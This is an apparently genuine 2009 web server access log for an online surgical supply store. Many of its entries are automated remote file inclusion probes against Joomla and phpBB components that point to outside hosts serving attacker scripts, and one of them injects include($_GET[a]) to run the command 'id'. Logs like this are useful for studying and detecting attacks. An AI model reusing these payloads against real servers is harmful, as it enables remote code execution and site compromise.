93.93.131.94 - - [28/Oct/2009:00:16:34 -0400] "GET /logs/access_log.Q109080800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:37 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
174.143.3.188 - - [28/Oct/2009:00:16:38 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [28/Oct/2009:00:16:39 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [28/Oct/2009:00:16:39 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.143.3.188 - - [28/Oct/2009:00:16:39 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:47 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:48 -0400] "GET /logs/access_log.Q109080800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:48 -0400] "GET /logs/access_log.Q109080800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:16:49 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:50 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:51 -0400] "GET /logs/access_log.Q109080800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:52 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:52 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:16:53 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
125.251.99.2 - - [28/Oct/2009:00:16:57 -0400] "GET //index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=' HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
93.93.131.94 - - [28/Oct/2009:00:16:57 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:17:00 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Oct/2009:00:17:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.72.215.82 - - [28/Oct/2009:00:18:12 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:18:12 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
200.24.102.162 - - [28/Oct/2009:00:18:15 -0400] "GET /logs/access_log.Q109071500//bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.24.102.162 - - [28/Oct/2009:00:18:15 -0400] "GET //bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.72.215.82 - - [28/Oct/2009:00:18:17 -0400] "GET /logs/access_log.Q109072900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:18:20 -0400] "GET /logs/access_log.Q109072900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:18:21 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:18:21 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:18:29 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
123.125.66.80 - - [28/Oct/2009:00:19:01 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
78.12.154.215 - - [28/Oct/2009:00:19:22 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02 HTTP/1.1" 200 65461 "http://images.google.it/imgres?imgurl=http://www.aceonlinestore.com/images/items/05560201_THUMB.JPG&imgrefurl=http://www.aceonlinestore.com/cgi-bin/lansaweb%3Fprocfun%2Bwordpr01%2Bwebfunc%2B%2520M37%2Bfuncparms%2BWEBKEY(A0100):DDCSRCH%2BRNDIV(S004):01%2BRNCLAS(S0040):07%2BRNSUBS(S0040):02&usg=__SRilvqFak1d-GolbX0WZgh5ZrQ4=&h=100&w=100&sz=4&hl=it&start=22&sig2=BmukVhVSsZgROldCs-BNCg&um=1&tbnid=YJrdFRdqXDL31M:&tbnh=82&tbnw=82&prev=/images%3Fq%3Dbone%2Bexpanders%26ndsp%3D20%26hl%3Dit%26rlz%3D1C1CHNG_itIT337IT337%26sa%3DN%26start%3D20%26um%3D1&ei=2sbnSvOvN8aI_Aaql_WABw" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:23 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/items/9600228_THUMB.JPG HTTP/1.1" 200 1865 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/items/04973401_THUMB.JPG HTTP/1.1" 200 1450 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/items/20155811_THUMB.JPG HTTP/1.1" 200 1748 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/items/05560000_THUMB.JPG HTTP/1.1" 200 2871 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/items/05560201_THUMB.JPG HTTP/1.1" 200 3299 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:24 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
78.12.154.215 - - [28/Oct/2009:00:19:25 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
200.24.102.162 - - [28/Oct/2009:00:19:59 -0400] "GET //bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
222.236.47.182 - - [28/Oct/2009:00:20:00 -0400] "GET /logs/access_log.Q109082300%20%20/components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.59.81.109 - - [28/Oct/2009:00:20:10 -0400] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://triton.100free.com/cmd.txt?&cmd=id? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.59.81.109 - - [28/Oct/2009:00:20:10 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://triton.100free.com/cmd.txt?&cmd=id? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
